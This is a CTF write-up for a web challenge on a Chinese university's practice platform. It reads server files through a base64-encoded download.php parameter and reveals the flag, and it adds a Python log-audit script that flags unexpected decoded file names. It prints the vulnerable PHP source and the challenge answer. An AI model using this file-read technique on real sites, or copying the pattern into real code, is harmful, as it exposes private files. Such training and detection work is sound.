  • Nanjing University of Posts and Telecommunications CTF platform write-up -- web -- Download~

    The site provides download links for two songs:

    http://way.nuptzj.cn/web6/download.php?url=eGluZ3hpbmdkaWFuZGVuZy5tcDM=

    http://way.nuptzj.cn/web6/download.php?url=YnV4aWFuZ3poYW5nZGEubXAz

    The name of the file to download is passed in base64-encoded form, so encode download.php in base64 as well: ZG93bmxvYWQucGhw

    Visit http://way.nuptzj.cn/web6/download.php?url=ZG93bmxvYWQucGhw to download download.php

    download.php

    <?php
    error_reporting(0);
    include("hereiskey.php");
    $url=base64_decode($_GET[url]);
    if( $url=="hereiskey.php" || $url=="buxiangzhangda.mp3" || $url=="xingxingdiandeng.mp3" || $url=="download.php"){
        $file_size = filesize($url);
        header ( "Pragma: public" );
        header ( "Cache-Control: must-revalidate, post-check=0, pre-check=0" );
        header ( "Cache-Control: private", false );
        header ( "Content-Transfer-Encoding: binary" );
        header ( "Content-Type:audio/mpeg MP3");
        header ( "Content-Length: " . $file_size);
        header ( "Content-Disposition: attachment; filename=".$url);
        echo(file_get_contents($url));
        exit;
    }
    else {
        echo "Access Forbidden!";
    }
    ?>

    The source reveals hereiskey.php; download hereiskey.php the same way.

    <?php
    //flag:nctf{download_any_file_666}
    ?>
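
An added example, not part of the original write-up or the challenge's code: a log-audit sketch that decodes the base64 `url` parameter of download.php requests and flags any decoded name other than the two songs. The function names and the sample request paths are constructed for illustration; the lenient decoding mirrors the plain `base64_decode()` call in the source shown above.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit, parse_qs

# The two songs the page links to; any other decoded name is outside intended use.
EXPECTED = {"xingxingdiandeng.mp3", "buxiangzhangda.mp3"}

def decode_target(request_url):
    """Return the file name carried in the base64 `url` parameter, or None."""
    values = parse_qs(urlsplit(request_url).query).get("url")
    if not values:
        return None
    # Assumption: mirror PHP's non-strict base64_decode(), which discards
    # characters outside the base64 alphabet, then restore the padding.
    raw = re.sub(r"[^A-Za-z0-9+/]", "", values[0])
    if not raw:
        return None
    raw += "=" * (-len(raw) % 4)
    try:
        return base64.b64decode(raw).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None

def classify(request_url):
    """Label one download.php request as expected, suspicious or undecodable."""
    name = decode_target(request_url)
    if name is None:
        return (None, "undecodable")
    if name in EXPECTED:
        return (name, "expected")
    return (name, "suspicious")

def sample_requests():
    """Constructed sample: the three request paths from the write-up plus two more."""
    base = "/web6/download.php?url="
    enc = lambda s: base64.b64encode(s.encode()).decode()
    return [
        base + "eGluZ3hpbmdkaWFuZGVuZy5tcDM=",
        base + "YnV4aWFuZ3poYW5nZGEubXAz",
        base + "ZG93bmxvYWQucGhw",
        base + enc("hereiskey.php"),
        base + "A",  # too short to be valid base64
    ]

if __name__ == "__main__":
    for url in sample_requests():
        print(classify(url), url)
```

Requests labelled suspicious here are exactly the ones the allowlist in download.php still serves, which is why the decoded name, not the encoded parameter, is what needs reviewing.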
  • Original article: https://www.cnblogs.com/vincebye/p/5940715.html